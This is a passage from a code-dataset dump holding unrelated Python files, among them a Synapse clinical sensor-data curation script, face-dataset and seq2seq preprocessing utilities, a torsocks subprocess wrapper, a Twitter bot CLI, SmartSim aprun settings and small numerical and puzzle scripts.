relevant_entities[syn_id][\"synapse_file\"] = f\n return relevant_entities\n\n\ndef slice_from_score(sensor_measurement, score, sensor):\n \"\"\"\n Returns\n -------\n a pandas DataFrame with columns location and sensor_data\n \"\"\"\n result = pd.DataFrame(columns = [\"sensor_location\", \"sensor_data\"])\n start, stop = score.loc[\"start_utc\"], score.loc[\"stop_utc\"]\n relevant_range = sensor_measurement[start:stop]\n if len(relevant_range) == 0:\n pass\n elif sensor == \"mc10\":\n for location in relevant_range.Location.unique():\n local_range = relevant_range.query(\"Location == @location\")\n local_range = local_range.drop([\"SubjID\", \"Location\"], axis = 1)\n local_range = local_range.reset_index(drop=False)\n time_zero = local_range.Timestamp.iloc[0]\n local_range.Timestamp = local_range.Timestamp - time_zero\n local_range.Timestamp = local_range.Timestamp.apply(\n lambda td : td.total_seconds())\n location = \"_\".join(location.split())\n result = result.append({\"sensor_location\": location,\n \"sensor_data\": local_range},\n ignore_index=True)\n elif sensor == \"smartwatch\":\n local_range = relevant_range.drop([\"SubjID\"], axis = 1)\n local_range = local_range.reset_index(drop=False)\n time_zero = local_range.Timestamp.iloc[0]\n time_end = local_range.Timestamp.iloc[-1]\n local_range.Timestamp = local_range.Timestamp - time_zero\n local_range.Timestamp = local_range.Timestamp.apply(\n lambda td : td.total_seconds())\n result = result.append({\"sensor_location\": None,\n \"sensor_data\": local_range},\n ignore_index=True)\n result.index = pd.Index([score.name] * len(result))\n return result\n\n\ndef slice_sensor_measurement(f, scores, relevant_task_ids, sensor):\n sensor_measurement = pd.read_csv(f.path)\n sensor_measurement.Timestamp = pd.to_datetime(sensor_measurement.Timestamp)\n sensor_measurement.set_index(\"Timestamp\", drop = True, inplace=True)\n sensor_measurement.sort_index(inplace=True)\n relevant_scores = scores.loc[relevant_task_ids,[\"start_utc\",\"stop_utc\"]]\n measurements = relevant_scores.apply(\n lambda score : slice_from_score(sensor_measurement, score, sensor),\n axis = 1)\n measurements = pd.concat(measurements.values, axis=0)\n return(measurements)\n\n\ndef replace_cols_with_filehandles(syn, df, cols, upload_in_parallel):\n if upload_in_parallel:\n mp = multiprocessing.dummy.Pool(4)\n for col in cols:\n df.loc[:,col] = list(mp.map(\n lambda df_ : replace_dataframe_with_filehandle(syn, df_),\n df[col]))\n else:\n for col in cols:\n df.loc[:,col] = list(map(\n lambda df_ : replace_dataframe_with_filehandle(syn, df_),\n df[col]))\n\n\ndef replace_dataframe_with_filehandle(syn, df):\n if isinstance(df, pd.DataFrame):\n f = tempfile.NamedTemporaryFile(suffix=\".csv\")\n df.to_csv(f.name, index=False)\n syn_f = syn.uploadSynapseManagedFileHandle(\n f.name, mimetype=\"text/csv\")\n f.close()\n return syn_f[\"id\"]\n else:\n return \"\"\n\n\ndef clean_scores(scores):\n # TODO: What to do with column `Side` and `Validated`?\n scores = scores.rename(SCORES_COL_MAP, axis = 1)\n scores_subset = scores.loc[:,[\"subject_id\", \"start_utc\", \"stop_utc\",\n \"tremor_left\", \"tremor_right\",\n \"bradykinesia_left\", \"bradykinesia_right\",\n \"dyskinesia_left\", \"dyskinesia_right\"]]\n # TODO: further process once we determine what column `Side` is for\n scores_subset = pd.melt(\n scores_subset,\n id_vars = [\"subject_id\", \"start_utc\", \"stop_utc\"],\n value_vars = [\"tremor_left\", \"tremor_right\",\n \"bradykinesia_left\", \"bradykinesia_right\",\n \"dyskinesia_left\", \"dyskinesia_right\"],\n value_name = \"score\")\n scores.task_code = scores.task_code.map(TASK_CODE_MAP)\n scores.start_utc = pd.to_datetime(scores.start_utc)\n scores.stop_utc = pd.to_datetime(scores.stop_utc)\n invalid_scores = scores[(pd.isnull(scores.start_utc)) | (pd.isnull(scores.stop_utc))]\n scores = scores.drop(invalid_scores.index)\n task_ids = [uuid.uuid4() for i in range(len(scores))]\n scores[\"task_id\"] = task_ids\n scores = scores.set_index(\"task_id\", drop = False)\n return scores\n\n\ndef move_index_to_column(df):\n df.reset_index(drop=False, inplace=True)\n df.rename({\"index\": \"task_id\"}, axis=1, inplace=True)\n\n\ndef create_cols(table_type, syn=None):\n if table_type == MC10_SENSOR_NAME:\n cols = [sc.Column(name=\"task_id\", columnType=\"STRING\"),\n sc.Column(name=\"sensor_location\", columnType=\"STRING\"),\n sc.Column(name=\"mc10_accelerometer\", columnType=\"FILEHANDLEID\"),\n sc.Column(name=\"mc10_gyroscope\", columnType=\"FILEHANDLEID\"),\n sc.Column(name=\"mc10_emg\", columnType=\"FILEHANDLEID\")]\n elif table_type == SMARTWATCH_SENSOR_NAME:\n cols = [sc.Column(name=\"task_id\", columnType=\"STRING\"),\n sc.Column(name=\"smartwatch_accelerometer\", columnType=\"FILEHANDLEID\")]\n elif table_type == \"scores\":\n cols = list(syn.getTableColumns(SCORES))\n for c in cols:\n c.pop('id')\n if c['name'] in SCORES_COL_MAP:\n c['name'] = SCORES_COL_MAP[c['name']]\n cols = [sc.Column(name=\"task_id\",\n columnType=\"STRING\")] + cols\n else:\n raise TypeError(\"table_type must be one of [{}, {}, {}]\".format(\n MC10_SENSOR_NAME, SMARTWATCH_SENSOR_NAME, \"scores\"))\n return cols\n\n\ndef store_dataframe_to_synapse(syn, df, parent, name, cols):\n schema = sc.Schema(name = name, columns = cols, parent = parent)\n table = sc.Table(schema, df)\n table = syn.store(table)\n return table\n\n\ndef main():\n args = read_args()\n syn = sc.login()\n scores = clean_scores(read_syn_table(syn, SCORES))\n\n # curate dataframes containing respective data measurements\n mc10_accelerometer = new_data_column(\n syn,\n scores = scores,\n col = \"mc10_accelerometer\",\n parent = MC10_MEASUREMENTS,\n filtering_prefix = \"Table9A\",\n sensor = \"mc10\",\n download_in_parallel = args.download_in_parallel)\n mc10_gyroscope = new_data_column(\n syn,\n scores = scores,\n col = \"mc10_gyroscope\",\n parent = MC10_MEASUREMENTS,\n filtering_prefix = \"Table9B\",\n sensor = \"mc10\",\n download_in_parallel = args.download_in_parallel)\n mc10_emg = new_data_column(\n syn,\n scores = scores,\n col = \"mc10_emg\",\n parent = MC10_MEASUREMENTS,\n filtering_prefix = \"Table9C\",\n sensor = \"mc10\",\n download_in_parallel = args.download_in_parallel)\n smartwatch_accelerometer = new_data_column(\n syn,\n scores = scores,\n col = \"smartwatch_accelerometer\",\n parent = SMARTWATCH_MEASUREMENTS,\n filtering_prefix = \"Table8\",\n sensor = \"smartwatch\",\n download_in_parallel = args.download_in_parallel)\n smartwatch_accelerometer = smartwatch_accelerometer.drop(\n \"sensor_location\", axis=1)\n\n # move task_id from index to column\n for df in [mc10_accelerometer, mc10_gyroscope,\n mc10_emg, smartwatch_accelerometer]:\n move_index_to_column(df)\n\n # combine mc10 measurements into a single file\n merged_mc10 = pd.DataFrame()\n if len(mc10_accelerometer) and len(mc10_gyroscope):\n merged_mc10 = mc10_accelerometer.merge(mc10_gyroscope, how=\"outer\")\n if len(merged_mc10) and len(mc10_emg):\n merged_mc10 = merged_mc10.merge(mc10_emg, how=\"outer\")\n\n # shuffle records so that file handle integer contains no useful information\n shuffled_mc10 = merged_mc10.sample(frac=FRAC_TO_STORE)\n shuffled_smartwatch = smartwatch_accelerometer.sample(frac=FRAC_TO_STORE)\n\n # replace the dataframes with file handles\n replace_cols_with_filehandles( # replaces in-place\n syn,\n df = shuffled_mc10,\n cols = [\"mc10_accelerometer\", \"mc10_gyroscope\", \"mc10_emg\"],\n upload_in_parallel = args.upload_in_parallel)\n replace_cols_with_filehandles( # replaces in-place\n syn,\n df = shuffled_smartwatch,\n cols = [\"smartwatch_accelerometer\"],\n upload_in_parallel = args.upload_in_parallel)\n\n # make the dataframes look pretty\n shuffled_mc10.sort_values([\"task_id\", \"sensor_location\"], inplace=True)\n shuffled_smartwatch.sort_values(\"task_id\", inplace=True)\n\n # backup in case we just created a bajillion file handles but\n # are rejected during table store\n shuffled_mc10.to_csv(\"mc10_backup.csv\", index=False)\n shuffled_smartwatch.to_csv(\"smartwatch_backup.csv\", index=False)\n scores.to_csv(\"scores_backup.csv\", index=False)\n\n # store to synapse\n shuffled_mc10_table = store_dataframe_to_synapse(\n syn,\n df = shuffled_mc10,\n parent = TABLE_OUTPUT,\n name = \"MC10 Sensor Measurements\",\n cols = create_cols(MC10_SENSOR_NAME))\n shuffled_smartwatch_table = store_dataframe_to_synapse(\n syn,\n df = shuffled_smartwatch,\n parent = TABLE_OUTPUT,\n name = \"Smartwatch Sensor Measurements\",\n cols = create_cols(SMARTWATCH_SENSOR_NAME))\n scores_table = store_dataframe_to_synapse(\n syn,\n df = scores,\n parent = TABLE_OUTPUT,\n name = \"Motor Task Timestamps and Scores\",\n cols = create_cols(\"scores\", syn=syn))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"curate_clinic_motor_tasks.py","file_name":"curate_clinic_motor_tasks.py","file_ext":"py","file_size_in_byte":15883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539396435","text":"import os\nimport random\nimport math\nimport copy\nDATASET = \"./lfw-deepfunneled\"\nTRAIN_TXT = \"train.txt\" \nVAL_TXT = \"val.txt\" \nPIC_FORMATS = [\"jpg\", \"png\", \"bmp\", \"jpeg\"]\nRATIO = 0.8\nMIN_PIC_NUM = 5\nPERSON_ID = 0\n\ndef get_data(person_name):\n global PERSON_ID\n pid = PERSON_ID\n res = []\n dir_name = \"%s/\" % person_name\n for name in os.listdir(DATASET + \"/\" + dir_name):\n if name.split(\".\")[-1] in PIC_FORMATS:\n res.append((pid, dir_name + name))\n if len(res) < MIN_PIC_NUM:\n pid -= 1\n return []\n PERSON_ID += 1\n random.shuffle(res)\n return res[:MIN_PIC_NUM]\n\ndef split_data(data):\n random.shuffle(data)\n i = int(math.ceil(len(data) * RATIO))\n return data[:i], data[i:]\n\ndef write_file(data, fn):\n fout = open(DATASET + \"/\" + fn, \"w\")\n for (idx, name) in data:\n fout.write(\"%s %d\\n\" % (name, idx))\n\ndef D(data):\n data = copy.copy(data)\n res = []\n tmp = []\n for group in data:\n for i in range(len(group)):\n u = (i+1) % len(group)\n res.append(group[i])\n res.append(group[u])\n tmp.append(group[i])\n random.shuffle(tmp)\n for t in tmp:\n res.append(t)\n random.shuffle(tmp)\n for t in tmp:\n res.append(t)\n return res\n\n\ntrain = []\nval = []\ntrain_o = []\nval_o = []\npeople = 0\nfor i in os.listdir(DATASET):\n try:\n train_p,val_p = split_data(get_data(i))\n if (len(val_p)):\n people += 1\n train.extend(train_p)\n val.extend(val_p)\n train_o.append(train_p)\n val_o.append(val_p)\n except:\n print (\"Ignore: %s\" % i)\n\nprint (\"People: %d\" % people)\nprint (len(train), len(val))\n'''\nrtrain = copy.copy(train)\nfor i in range(10):\n random.shuffle(rtrain)\n train.extend(rtrain)\n'''\nwrite_file(train, TRAIN_TXT)\nwrite_file(val, VAL_TXT)\n#write_file(D(train_o), TRAIN_TXT)\n#write_file(D(val_o), VAL_TXT)\n","sub_path":"build_label.py","file_name":"build_label.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"241808083","text":"import re\n\ndata = None\n\nwith open(\"input.txt\",encoding=\"utf-8\") as inpf:\n data = inpf.read().split(\"\\n\")\n\nanswer = 0\n\ndef range_compare(range1:list,range2:list)->bool:\n contains = False\n for x in range1:\n if x in range2:\n contains = True\n return contains\n\nfor d in data:\n a,b,x,y = map(int,[i for j in d.split(\",\") for i in j.split(\"-\")])\n range1 = list(range(a,b+1))\n range2 = list(range(x,y+1))\n if range_compare(range1,range2) or range_compare(range2,range1):\n answer += 1\nprint(answer)","sub_path":"2022/day-4.2.py","file_name":"day-4.2.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"166707041","text":"import matplotlib.pyplot as plt\nimport math\nimport sys\nimport scipy.optimize\nimport numpy as np\nimport apro\nfrom sympy import Matrix, zeros, pprint\nsys.path.insert(1, r'C:\\Users\\Mateusz\\wwsis_projects\\Algebra-algorytmy\\lista_1')\nfrom sy_gaussian import gaussian_elimination, solve\n\n\ndef func(x, a_0, a_1, a_2):\n return math.exp(-(a_0 + a_1*x + a_2*x**2))\n\ndef mnk():\n x = Matrix([1., 1.25, 1.5, 1.75, 2., 2.25, 2.5])\n y = Matrix([0.16, 0.99, 3.095, 4.485, 3.075, 1.01, 0.145])\n m = 3\n n = 4\n A = zeros(m, n)\n for row in range(m):\n for col in range(n):\n if row == 0 and col == 0:\n A[row, col] = len(x)\n elif col != n - 1:\n A[row, col] = sum([math.pow(elem, row + col) for elem in x])\n else:\n x_to_power = Matrix([math.pow(elem, row) for elem in x])\n y_ln = Matrix([math.log(elem) for elem in y])\n A [row, col] = x_to_power.dot(y_ln)\n pprint(A)\n gaussian_elimination(A)\n A = solve(A)\n for row in range(m):\n A[row] = -A[row]\n plot_x = np.linspace(1, 2.5, 100)\n plot_y = []\n plot_apro_x, plot_apro_y = apro.matrix_method()\n for elem in plot_x:\n plot_y.append(func(elem, A[0], A[1], A[2]))\n plt.scatter(x, y, color='red')\n plt.plot(plot_x, plot_y, label='e^(-(a0 + a1x + a2x^2))')\n plt.plot(plot_apro_x, plot_apro_y, color='green', label='a0 + a1x + a2x^2')\n plt.legend(loc='upper left')\n plt.show()\n\n\nif __name__ == \"__main__\":\n mnk()\n","sub_path":"lista_3/mnk.py","file_name":"mnk.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468220423","text":"from setuptools import setup, find_packages\n\nreadme = open('README.rst').read().strip()\ninstall = open('INSTALL.rst').read().strip()\nauthors = open('AUTHORS.rst').read().strip()\nhistory = open('CHANGES.rst').read().strip()\n\nlong_description = (\n readme + '\\n\\n' + install + '\\n\\n' + authors + '\\n\\n' + history)\n\nsetup(\n name='Products.eXtremeManagement',\n version='3.0.dev0',\n description=\"Project administration which supports the eXtreme Programming methodology.\",\n long_description=long_description,\n classifiers=[\n \"Framework :: Plone\",\n \"Framework :: Plone :: 4.3\",\n \"Framework :: Zope2\",\n \"Framework :: Zope3\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords='project time management',\n author='Zest Software',\n author_email='info@zestsoftware.nl',\n url='https://github.com/zestsoftware/Products.eXtremeManagement/',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['Products'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'xm.booking',\n 'xm.portlets',\n 'xm.tracker',\n 'xm.charting',\n 'kss.plugin.yuidnd',\n 'kss.plugin.cns',\n 'Products.contentmigration >= 1.0b4',\n 'Products.Poi',\n 'pygooglechart',\n 'collective.autopermission',\n 'zope.app.content',\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271977485","text":"import threading\nimport subprocess\n\nimport log\n\nlogger = log.getLogger()\n\nclass Command( object ):\n\n def __init__( self, torsocksConf=\"\" ):\n\n self.env = dict()\n\n if torsocksConf:\n self.env[\"TORSOCKS_CONF_FILE\"] = torsocksConf\n\n self.command = [\"torsocks\"]\n self.process = None\n self.stdout = None\n self.stderr = None\n\n def _invokeProcess( self ):\n \"\"\"\n Invoke the process and wait for it to finish.\n\n If a callback was specified, it is called with the process' output as\n argument and together with a function which can be used to terminate\n the process.\n \"\"\"\n\n self.process = subprocess.Popen(self.command, env=self.env,\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE)\n\n if self.outputCallback:\n\n # Read the process' output line by line and pass it to the\n # callback.\n while True:\n\n if self.outputWatch == \"stdout\":\n line = self.process.stdout.readline().strip()\n else:\n line = self.process.stderr.readline().strip()\n\n if line:\n self.outputCallback(line, self.process.terminate)\n else:\n break\n\n # Wait for the process to finish.\n self.stdout, self.stderr = self.process.communicate()\n\n def execute( self, command, timeout=5, outputCallback=None,\n outputWatch=\"None\" ):\n\n\n self.command += command\n self.outputCallback = outputCallback\n self.outputWatch = outputWatch\n\n logger.debug(\"Invoking '%s' in environment '%s'\" %\n (' '.join(self.command),\n str(self.env)))\n\n thread = threading.Thread(target=self._invokeProcess)\n thread.start()\n thread.join(timeout)\n\n # Kill the process if it doesn't react. With fire^Wterminate().\n if thread.isAlive():\n logger.debug(\"Terminating subprocess after waiting for more \" \\\n \"than %d seconds.\" % timeout)\n try:\n self.process.terminate()\n except OSError as e:\n logger.error(e)\n\n thread.join()\n\n return (self.stdout, self.stderr)\n\n# Alias class name to provide more intuitive interface.\nnew = Command\n","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413248821","text":"import sys\nimport logging\nimport plac\n\nfrom iycaro import settings\n\nfrom .twitter import add_account as twitter_add_account\nfrom .twitter import list_accounts as twitter_list_accounts\nfrom .social import post_videos as social_post_videos\nfrom .social import like_tweets as social_like_tweets\nfrom .utils import perforated_video\nfrom .utils import perforated_video_in_gif\n\n\ncommands = {\n 'twitter_add_account': twitter_add_account,\n 'twitter_list_accounts': twitter_list_accounts,\n 'social_post_videos': social_post_videos,\n 'social_like_tweets': social_like_tweets,\n 'perforated_video': perforated_video,\n 'perforated_video_in_gif': perforated_video_in_gif,\n}\n\n\n@plac.annotations(\n debug_mode=plac.Annotation(\n help='Set logger level to DEBUG',\n kind='flag',\n abbrev='D'),\n command=plac.Annotation(\n help='Command name',\n kind='positional',\n type=str,\n choices=commands.keys()))\ndef cli(debug_mode, command, *args):\n level = logging.DEBUG if debug_mode else logging.INFO\n logging.basicConfig(\n format=settings.LOGGER_FORMAT,\n level=level)\n\n plac.call(commands[command], args)\n\n\nplac.call(cli, sys.argv[1:])\n","sub_path":"iycaro/cli/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"619965227","text":"import re\nimport collections\n\nvocabulary_size = 10000\nvocabulary_path = \"cache/vocabulary\"\n\nX_train_path = 'cache/X_train'\ny_train_path = 'cache/y_train'\nX_val_path = 'cache/X_val'\ny_val_path = 'cache/y_val'\n\nPAD_ID = 0\nGO_ID = 1\nEOS_ID = 2\nUNK_ID = 3\n\n_WORD_SPLIT = re.compile(b\"([.,!?\\\":;)(])\")\n\ndef create_save_dictionary(words, vocabulary_path, vocabulary_size):\n\n count = [['_UNK', -1]]\n count.extend(collections.Counter(words).most_common(vocabulary_size - 1))\n\n dictionary = dict()\n\n for word, _ in count:\n dictionary[word] = len(dictionary)\n\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n\n f = open(vocabulary_path, 'w')\n for key in dictionary:\n f.write(key + '\\n')\n f.close()\n\n return dictionary, reverse_dictionary\n\ndef generate_encoded_files(tokenized_sentences, dictionary):\n\n encoded_holder = []\n f1 = open(X_train_path, 'w')\n\n last_line = tokenized_sentences.pop()\n first_line = tokenized_sentences.pop(0)\n dev_counter = int(len(tokenized_sentences) - len(tokenized_sentences) /50)\n\n unk_id = dictionary['_UNK']\n first_line_encoded = encode_sentence(first_line, dictionary, unk_id)\n f1.write(first_line_encoded + '\\n')\n\n for x in xrange(dev_counter):\n encoded_sentence = encode_sentence(tokenized_sentences[x], dictionary, unk_id)\n encoded_holder.append(encoded_sentence)\n f1.write(encoded_sentence + '\\n') # Write sentence to file\n f1.close()\n\n d1 = open(X_val_path, 'w')\n for x in xrange(dev_counter, len(tokenized_sentences)):\n encoded_sentence = encode_sentence(tokenized_sentences[x], dictionary, unk_id)\n encoded_holder.append(encoded_sentence)\n d1.write(encoded_sentence + '\\n') # Write sentence to file\n\n d1.close()\n\n f2 = open(y_train_path, 'w')\n\n for x in xrange(dev_counter + 1):\n f2.write(encoded_holder[x] + '\\n') # Write sentence to file\n\n f2.close()\n\n d2 = open(y_val_path, 'w')\n for x in xrange(dev_counter + 1, len(tokenized_sentences)):\n d2.write(encoded_holder[x] + '\\n') # Write sentence to file\n\n last_line_encoded = encode_sentence(last_line, dictionary, unk_id)\n d2.write(last_line_encoded + '\\n')\n d2.close()\n\ndef encode_sentence(sentence, dictionary, unk_id):\n if not sentence:\n return \"\"\n first_word = sentence.pop(0)\n if first_word in dictionary:\n encoded_sentence = str(dictionary[first_word])\n else:\n encoded_sentence = str(unk_id)\n\n for word in sentence:\n if word in dictionary:\n encoded_word = dictionary[word]\n else:\n encoded_word = unk_id\n encoded_sentence += \" \" + str(encoded_word)\n return encoded_sentence\n\ndef read_data(path, read_as_sentence = False):\n data = []\n lines = [line.rstrip('\\n') for line in open(path)]\n local_data = []\n\n if read_as_sentence:\n for line in lines:\n local_data.append(re.findall(r'\\S+', line))\n else:\n for line in lines:\n local_data.extend(re.findall(r'\\S+', line))\n\n data.extend(local_data)\n return data\n\ndef encode_test_sentence(sentence, vocabulary):\n words = []\n\n for space_separated_fragment in sentence.strip().split():\n words.extend(re.split(_WORD_SPLIT, space_separated_fragment))\n\n words_clean = [w for w in words if w]\n\n return [vocabulary.get(w, UNK_ID) for w in words_clean]\n\ndef load_vocabulary(vocabulary_path):\n rev_vocab = []\n with open(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n\ndef prepare_dataset_encoded(dataset_path, vocabulary_size):\n\n data = read_data(dataset_path)\n dictionary, reverse_dictionary = create_save_dictionary(data, vocabulary_path, vocabulary_size)\n sentences = read_data(dataset_path, read_as_sentence=True)\n generate_encoded_files(sentences,dictionary)\n","sub_path":"preprocessing/data_preprocessor.py","file_name":"data_preprocessor.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"270152243","text":"\"\"\"\nQuadratic Probing Hash Table based functions, timings and statistics\n\n@author Mark Diedericks 30572738\n@since 21/10/2019\n@modified 21/10/2019\n\"\"\"\n\nfrom task1 import HashTable as HashTableLinear\nfrom task3 import load_dictionary_statistics\n\nclass HashTable(HashTableLinear): \n ### Override only the methods which directly implement linear probing ###\n ### Implement quadratic probing instead. ###\n \n def probe_step(self, i):\n \"\"\"\n Will return an integer step for the given index.\n\n @param i: the index at which to calculate the step\n @return The step, from the original hash index, which should be taken\n @complexity O(1) for both best and worst case\n \"\"\"\n return i**2;\n\n\ndef table_load_dictionary_statistics(max_time):\n \"\"\"\n Will execute load_dictionary_time on a combination of files, sizes and bases. Saving the data, along with timing and words\n to a file. Uses quadratic probing hash table instead of a linear probing hash table.\n \n @param max_time: how long load_dictionary operates before timing out, if none the function wont time out\n @return None\n @complexity O(nm) for both best and worst case. Where n is cost of load_dictionary and m is the number of size-base-file combinations\n @postcondition A file, 'output_task4.csv', will contain the filename, table, base, words, collisions, probe length, max probe length \n and rehash count time data for each combination.\n \"\"\"\n\n TABLE_BASE = [1, 27183, 250726]\n TABLE_SIZE = [250727, 402221, 1000081]\n FILE_NAMES = [\"english_small.txt\", \"english_large.txt\", \"french.txt\"]\n\n # Get output file handle\n f = open(\"output_task4.csv\", 'w+', encoding=\"UTF-8\")\n\n # Create headers\n f.write('File Name,Table Size,Table Base,Words,Time,Collisions,Probe Total,Probe Max, Rehashes\\n')\n\n # Loop through each combination\n for file in FILE_NAMES:\n for size in TABLE_SIZE:\n for base in TABLE_BASE:\n # Run combination with quadratic probing hash table\n res = load_dictionary_statistics(base, size, file, max_time, HashTable(size, base))\n\n words = res[0]\n time = res[1] if res[1] is not None else \"TIMEOUT\"\n col = res[2]\n pro = res[3]\n promax = res[4]\n rehashes = res[5]\n\n # Print results to file\n f.write('{0},{1},{2},{3},{4},{5},{6},{7},{8}\\n'.format(file, size, base, words, time, col, pro, promax, rehashes))\n\n # Close file\n f.close()\n\n # Ensure file is closed\n if not f.closed:\n raise IOError('File is not closed.')\n\n\nif __name__ == '__main__':\n table_load_dictionary_statistics(120)","sub_path":"Submission/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170597702","text":"# BSD 2-Clause License\n#\n# Copyright (c) 2021, Hewlett Packard Enterprise\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom .settings import RunSettings\n\n\nclass AprunSettings(RunSettings):\n def __init__(self, exe, exe_args=None, run_args=None, env_vars=None):\n \"\"\"Settings to run job with ``aprun`` command\n\n ``AprunSettings`` can be used for both the `pbs` and `cobalt`\n launchers.\n\n :param exe: executable\n :type exe: str\n :param exe_args: executable arguments, defaults to None\n :type exe_args: str | list[str], optional\n :param run_args: arguments for run command, defaults to None\n :type run_args: dict[str, str], optional\n :param env_vars: environment vars to launch job with, defaults to None\n :type env_vars: dict[str, str], optional\n \"\"\"\n super().__init__(\n exe, exe_args, run_command=\"aprun\", run_args=run_args, env_vars=env_vars\n )\n self.mpmd = []\n\n def make_mpmd(self, aprun_settings):\n \"\"\"Make job a MPMD job\n\n This method combines two ``AprunSettings``\n into a single MPMD command joined with ':'\n\n :param aprun_settings: ``AprunSettings`` instance\n :type aprun_settings: AprunSettings\n \"\"\"\n self.mpmd.append(aprun_settings)\n\n def set_cpus_per_task(self, num_cpus):\n \"\"\"Set the number of cpus to use per task\n\n This sets ``--cpus-per-pe``\n\n :param num_cpus: number of cpus to use per task\n :type num_cpus: int\n \"\"\"\n self.run_args[\"cpus-per-pe\"] = int(num_cpus)\n\n def set_tasks(self, num_tasks):\n \"\"\"Set the number of tasks for this job\n\n This sets ``--pes``\n\n :param num_tasks: number of tasks\n :type num_tasks: int\n \"\"\"\n self.run_args[\"pes\"] = int(num_tasks)\n\n def set_tasks_per_node(self, num_tpn):\n \"\"\"Set the number of tasks for this job\n\n This sets ``--pes-per-node``\n\n :param num_tpn: number of tasks per node\n :type num_tpn: int\n \"\"\"\n self.run_args[\"pes-per-node\"] = int(num_tpn)\n\n def set_hostlist(self, host_list):\n \"\"\"Specify the hostlist for this job\n\n :param host_list: hosts to launch on\n :type host_list: list[str]\n :raises TypeError:\n \"\"\"\n if isinstance(host_list, str):\n host_list = [host_list.strip()]\n if not isinstance(host_list, list):\n raise TypeError(\"host_list argument must be a list of strings\")\n if not all([isinstance(host, str) for host in host_list]):\n raise TypeError(\"host_list argument must be list of strings\")\n self.run_args[\"nodelist\"] = \",\".join(host_list)\n\n def format_run_args(self):\n \"\"\"Return a list of ALPS formatted run arguments\n\n :return: list ALPS arguments for these settings\n :rtype: list[str]\n \"\"\"\n # args launcher uses\n args = []\n restricted = [\"wdir\"]\n\n for opt, value in self.run_args.items():\n if opt not in restricted:\n short_arg = bool(len(str(opt)) == 1)\n prefix = \"-\" if short_arg else \"--\"\n if not value:\n args += [prefix + opt]\n else:\n if short_arg:\n args += [prefix + opt, str(value)]\n else:\n args += [\"=\".join((prefix + opt, str(value)))]\n return args\n\n def format_env_vars(self):\n \"\"\"Format the environment variables for aprun\n\n :return: list of env vars\n :rtype: list[str]\n \"\"\"\n formatted = []\n if self.env_vars:\n for name, value in self.env_vars.items():\n formatted += [\"-e\", name + \"=\" + str(value)]\n return formatted\n","sub_path":"smartsim/settings/alpsSettings.py","file_name":"alpsSettings.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603513424","text":"import matplotlib.pyplot as plt\r\nfrom sklearn import datasets, svm, metrics\r\nfrom sklearn.model_selection import train_test_split\r\ndigits = datasets.load_digits()\r\n# digits dataset consists of 8x8 pixel images of hand written digits\r\n#images attribute of the dataset stores 8x8 arrays of grayscale values for each image\r\n# We will use these arrays to visualize the first 4 images\r\n# target attribute of the dataset stores the digit each image represents (included in title of 4 plots below)\r\n_,axes = plt.subplots(nrows=1, ncols=4, figsize=(10, 3))\r\nfor ax, image, label in zip(axes, digits.images, 